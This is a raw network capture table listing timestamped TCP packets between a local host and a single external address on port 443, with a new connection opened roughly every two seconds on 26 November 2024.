          Nov 26, 2024 08:12:06.308173895 CET49874443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:06.355323076 CET4434987450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:06.827953100 CET4434987450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:06.828027964 CET4434987450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:06.828142881 CET49874443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:06.828440905 CET49874443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:06.828460932 CET4434987450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:06.828481913 CET49874443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:06.828488111 CET4434987450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:07.021146059 CET49879443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:07.021193027 CET4434987950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:07.021281958 CET49879443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:07.032171011 CET49879443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:07.032274961 CET4434987950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:07.032357931 CET49879443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:07.330826044 CET49880443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:07.330879927 CET4434988050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:07.330979109 CET49880443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:07.331603050 CET49880443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:07.331617117 CET4434988050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:08.798197031 CET4434988050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:08.798340082 CET49880443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:08.799742937 CET49880443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:08.799753904 CET4434988050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:08.800004005 CET4434988050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:08.801254034 CET49880443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:08.843370914 CET4434988050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:09.326946020 CET4434988050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:09.327045918 CET4434988050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:09.327116966 CET49880443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:09.337116957 CET49880443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:09.337138891 CET4434988050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:09.337152958 CET49880443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:09.337158918 CET4434988050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:09.541486025 CET49886443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:09.541518927 CET4434988650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:09.541575909 CET49886443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:09.542082071 CET49886443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:09.542129040 CET4434988650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:09.542176962 CET49886443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:09.555223942 CET49887443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:09.555258036 CET4434988750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:09.555347919 CET49887443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:09.555831909 CET49887443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:09.555843115 CET4434988750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:10.965661049 CET4434988750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:10.965821981 CET49887443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:10.967258930 CET49887443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:10.967271090 CET4434988750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:10.967581034 CET4434988750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:10.972307920 CET49887443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:11.019340038 CET4434988750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:11.484247923 CET4434988750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:11.484323978 CET4434988750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:11.484657049 CET49887443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:11.484734058 CET49887443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:11.484745026 CET4434988750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:11.484765053 CET49887443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:11.484770060 CET4434988750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:11.674856901 CET49893443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:11.674947977 CET4434989350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:11.675126076 CET49893443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:11.675614119 CET49893443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:11.675669909 CET4434989350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:11.675754070 CET49893443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:11.685859919 CET49894443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:11.685902119 CET4434989450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:11.685997009 CET49894443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:11.686702967 CET49894443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:11.686716080 CET4434989450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:13.340905905 CET4434989450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:13.341006041 CET49894443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:13.342365026 CET49894443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:13.342376947 CET4434989450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:13.342633009 CET4434989450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:13.344276905 CET49894443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:13.391333103 CET4434989450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:13.862027884 CET4434989450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:13.862104893 CET4434989450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:13.862205982 CET49894443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:13.862468958 CET49894443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:13.862488985 CET4434989450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:13.862500906 CET49894443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:13.862508059 CET4434989450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:14.061352968 CET49900443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:14.061413050 CET4434990050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:14.061541080 CET49900443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:14.069238901 CET49900443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:14.069299936 CET4434990050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:14.069365978 CET49900443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:14.082675934 CET49901443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:14.082724094 CET4434990150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:14.082813978 CET49901443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:14.083169937 CET49901443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:14.083184958 CET4434990150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:15.494072914 CET4434990150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:15.494268894 CET49901443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:15.495673895 CET49901443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:15.495687962 CET4434990150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:15.495981932 CET4434990150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:15.497315884 CET49901443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:15.539331913 CET4434990150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:16.012834072 CET4434990150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:16.012923002 CET4434990150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:16.012988091 CET49901443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:16.013386965 CET49901443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:16.013403893 CET4434990150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:16.013427973 CET49901443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:16.013433933 CET4434990150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:16.247549057 CET49907443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:16.247582912 CET4434990750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:16.247704983 CET49907443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:16.248395920 CET49907443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:16.248437881 CET4434990750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:16.248511076 CET49907443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:16.262495041 CET49908443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:16.262536049 CET4434990850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:16.262624979 CET49908443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:16.263003111 CET49908443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:16.263017893 CET4434990850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:17.724387884 CET4434990850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:17.724462032 CET49908443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:17.726135969 CET49908443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:17.726147890 CET4434990850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:17.726430893 CET4434990850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:17.727581024 CET49908443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:17.771370888 CET4434990850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:18.254254103 CET4434990850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:18.254349947 CET4434990850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:18.254412889 CET49908443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:18.254736900 CET49908443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:18.254741907 CET4434990850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:18.254775047 CET49908443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:18.254780054 CET4434990850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:18.446624041 CET49914443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:18.446662903 CET4434991450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:18.446748018 CET49914443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:18.454952002 CET49914443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:18.455008030 CET4434991450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:18.455066919 CET49914443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:18.469861984 CET49915443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:18.469907045 CET4434991550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:18.469974041 CET49915443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:18.470855951 CET49915443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:18.470874071 CET4434991550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:19.928884029 CET4434991550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:19.929032087 CET49915443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:19.931631088 CET49915443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:19.931642056 CET4434991550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:19.932060003 CET4434991550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:19.933923006 CET49915443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:19.975337982 CET4434991550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:20.458013058 CET4434991550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:20.458105087 CET4434991550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:20.458159924 CET49915443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:20.458451986 CET49915443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:20.458451986 CET49915443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:20.458466053 CET4434991550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:20.458475113 CET4434991550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:20.648869038 CET49921443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:20.648926020 CET4434992150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:20.649017096 CET49921443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:20.649149895 CET49921443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:20.649204969 CET4434992150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:20.651145935 CET49921443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:20.658776999 CET49922443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:20.658802986 CET4434992250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:20.658879995 CET49922443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:20.659199953 CET49922443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:20.659214020 CET4434992250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:22.115041018 CET4434992250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:22.115165949 CET49922443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.116504908 CET49922443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.116523981 CET4434992250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:22.116779089 CET4434992250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:22.120012045 CET49922443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.167330980 CET4434992250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:22.642764091 CET4434992250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:22.642852068 CET4434992250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:22.643227100 CET49922443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.643280983 CET49922443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.643301010 CET4434992250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:22.643336058 CET49922443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.643342972 CET4434992250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:22.820280075 CET49928443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.820327044 CET4434992850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:22.820503950 CET49928443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.820841074 CET49928443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.820887089 CET4434992850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:22.820959091 CET49928443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.830718040 CET49929443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.830773115 CET4434992950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:22.830885887 CET49929443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.831201077 CET49929443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:22.831226110 CET4434992950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:24.244940996 CET4434992950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:24.245099068 CET49929443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.246455908 CET49929443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.246467113 CET4434992950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:24.246718884 CET4434992950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:24.247930050 CET49929443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.291332960 CET4434992950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:24.764797926 CET4434992950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:24.764872074 CET4434992950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:24.765043974 CET49929443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.765393972 CET49929443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.765409946 CET4434992950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:24.765423059 CET49929443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.765429020 CET4434992950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:24.978034019 CET49935443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.978065968 CET4434993550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:24.978147030 CET49935443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.978271008 CET49935443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.978301048 CET4434993550.7.187.218192.168.2.6
          Nov 26, 2024 08:12:24.978352070 CET49935443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.991766930 CET49936443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.991806984 CET4434993650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:24.991904974 CET49936443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.992233992 CET49936443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:24.992244959 CET4434993650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:26.450007915 CET4434993650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:26.450205088 CET49936443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:26.451473951 CET49936443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:26.451486111 CET4434993650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:26.451725960 CET4434993650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:26.453217030 CET49936443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:26.495333910 CET4434993650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:26.978852034 CET4434993650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:26.978938103 CET4434993650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:26.979008913 CET49936443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:26.979338884 CET49936443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:26.979362965 CET4434993650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:26.979374886 CET49936443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:26.979382038 CET4434993650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:27.155622005 CET49942443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:27.155661106 CET4434994250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:27.155750990 CET49942443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:27.155903101 CET49942443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:27.155941010 CET4434994250.7.187.218192.168.2.6
          Nov 26, 2024 08:12:27.155999899 CET49942443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:27.165448904 CET49943443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:27.165493011 CET4434994350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:27.165585995 CET49943443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:27.165998936 CET49943443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:27.166012049 CET4434994350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:28.625432014 CET4434994350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:28.625680923 CET49943443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:28.627191067 CET49943443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:28.627207994 CET4434994350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:28.627549887 CET4434994350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:28.629266024 CET49943443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:28.675328970 CET4434994350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:29.153637886 CET4434994350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:29.153721094 CET4434994350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:29.153839111 CET49943443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:29.154036999 CET49943443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:29.154056072 CET4434994350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:29.154095888 CET49943443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:29.154103041 CET4434994350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:29.325747013 CET49949443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:29.325790882 CET4434994950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:29.325886011 CET49949443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:29.325982094 CET49949443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:29.326066971 CET4434994950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:29.326126099 CET49949443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:29.335174084 CET49950443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:29.335223913 CET4434995050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:29.335309029 CET49950443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:29.335644007 CET49950443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:29.335656881 CET4434995050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:30.796050072 CET4434995050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:30.796189070 CET49950443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:30.797641039 CET49950443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:30.797661066 CET4434995050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:30.797926903 CET4434995050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:30.799211979 CET49950443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:30.843333006 CET4434995050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:31.325048923 CET4434995050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:31.325120926 CET4434995050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:31.325500965 CET49950443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:31.325500965 CET49950443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:31.329178095 CET49950443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:31.329226971 CET4434995050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:31.501698017 CET49956443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:31.501761913 CET4434995650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:31.501872063 CET49956443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:31.502017021 CET49956443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:31.502063990 CET4434995650.7.187.218192.168.2.6
          Nov 26, 2024 08:12:31.502123117 CET49956443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:31.511580944 CET49957443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:31.511624098 CET4434995750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:31.511734009 CET49957443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:31.512058020 CET49957443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:31.512082100 CET4434995750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:32.969122887 CET4434995750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:32.969435930 CET49957443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.052138090 CET49957443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.052159071 CET4434995750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:33.052546978 CET4434995750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:33.054322958 CET49957443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.099330902 CET4434995750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:33.499056101 CET4434995750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:33.499138117 CET4434995750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:33.499193907 CET49957443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.499540091 CET49957443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.499540091 CET49957443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.499558926 CET4434995750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:33.499567986 CET4434995750.7.187.218192.168.2.6
          Nov 26, 2024 08:12:33.687856913 CET49963443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.687916994 CET4434996350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:33.687985897 CET49963443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.688261032 CET49963443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.688304901 CET4434996350.7.187.218192.168.2.6
          Nov 26, 2024 08:12:33.688359976 CET49963443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.699721098 CET49964443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.699815035 CET4434996450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:33.699898005 CET49964443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.700310946 CET49964443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:33.700339079 CET4434996450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:35.120239973 CET4434996450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:35.120345116 CET49964443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:35.121712923 CET49964443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:35.121728897 CET4434996450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:35.121997118 CET4434996450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:35.123234987 CET49964443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:35.167330980 CET4434996450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:35.922117949 CET4434996450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:35.922187090 CET4434996450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:35.922287941 CET49964443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:35.922532082 CET49964443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:35.922549963 CET4434996450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:35.922568083 CET49964443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:35.922574043 CET4434996450.7.187.218192.168.2.6
          Nov 26, 2024 08:12:36.096049070 CET49970443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:36.096101999 CET4434997050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:36.096189022 CET49970443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:36.096311092 CET49970443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:36.096353054 CET4434997050.7.187.218192.168.2.6
          Nov 26, 2024 08:12:36.096399069 CET49970443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:36.106887102 CET49971443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:36.106929064 CET4434997150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:36.107021093 CET49971443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:36.107625008 CET49971443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:36.107642889 CET4434997150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:37.475650072 CET4434997150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:37.475728035 CET49971443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:37.477560997 CET49971443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:37.477566957 CET4434997150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:37.477857113 CET4434997150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:37.479156017 CET49971443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:37.523334980 CET4434997150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:37.985250950 CET4434997150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:37.985333920 CET4434997150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:37.985394955 CET49971443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:37.985611916 CET49971443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:37.985625029 CET4434997150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:37.985639095 CET49971443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:37.985645056 CET4434997150.7.187.218192.168.2.6
          Nov 26, 2024 08:12:38.161597967 CET49978443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:38.161643982 CET4434997850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:38.161900043 CET49978443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:38.161900043 CET49978443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:38.162039042 CET4434997850.7.187.218192.168.2.6
          Nov 26, 2024 08:12:38.162179947 CET49978443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:38.171673059 CET49979443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:38.171715021 CET4434997950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:38.171798944 CET49979443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:38.172178984 CET49979443192.168.2.650.7.187.218
          Nov 26, 2024 08:12:38.172190905 CET4434997950.7.187.218192.168.2.6
          Nov 26, 2024 08:12:39.583458900 CET4434997950.7.187.218192.168.2.6
